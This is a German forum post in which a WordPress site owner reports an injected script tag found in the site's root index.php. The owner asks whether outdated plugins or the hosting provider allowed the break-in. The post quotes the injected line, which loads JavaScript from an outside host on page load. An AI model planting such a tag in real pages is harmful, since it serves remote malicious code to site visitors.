Hallo,
gestern hat uns ein Kunde informiert, dass es ein problem mit der Webseite gibt!
Nach kurzem Check stellte sich heraus, dass in der index.php im Wordpress-Rootfolder etwas eingetragen wurde: Ein JS einer SPAM-WARE:
<script type="text/javascript" src="http://madskill.com/jex/cb.php"POC"</script>
Nun die Frage:
Kann man über Plugins mit Sicherheitslücke einem Span-Bot Zugang auf die Index.php von Wordpress geben um diese zu manipulieren?
Komischerweise wurde zeitgleich vom Provider Updates gefahren was die Seite so oder so lahm legte, was für mich eher auf eine Sicherheitslücke in deren System hinweist und somit Zugriff auf den FTP zuließ!?
Ich würde nun gern wissen, ob ich eher dem Provider anhauen soll die Passwörter des Webspaces zu ändern, da sie wohl die sicherheitslücken hatten oder ob wir die Plugins tauschen müßen!? Der Provider ist ein eher kleiner & privater Anbieter in Ort!
Wordpress läuft seit 2 Jahren stabil auf 3.2
Plugins sind folgende:
Admin Menu Editor - Version 1.1.3
Advanced Custom Fields - Version 2.0.5
Bild/Foto - Version 3
BWP Google XML Sitemaps - Version 1.1.4
Contact Form 7 - Version 2.4.6
Custom Taxonomy Sort - Version 1.1.2
MEE News Premium - Version 5.0.1
WP SlimStat & WP SlimStat Dashboard Widgets - Version 2.5
Besten Dank für euer feedback!
thx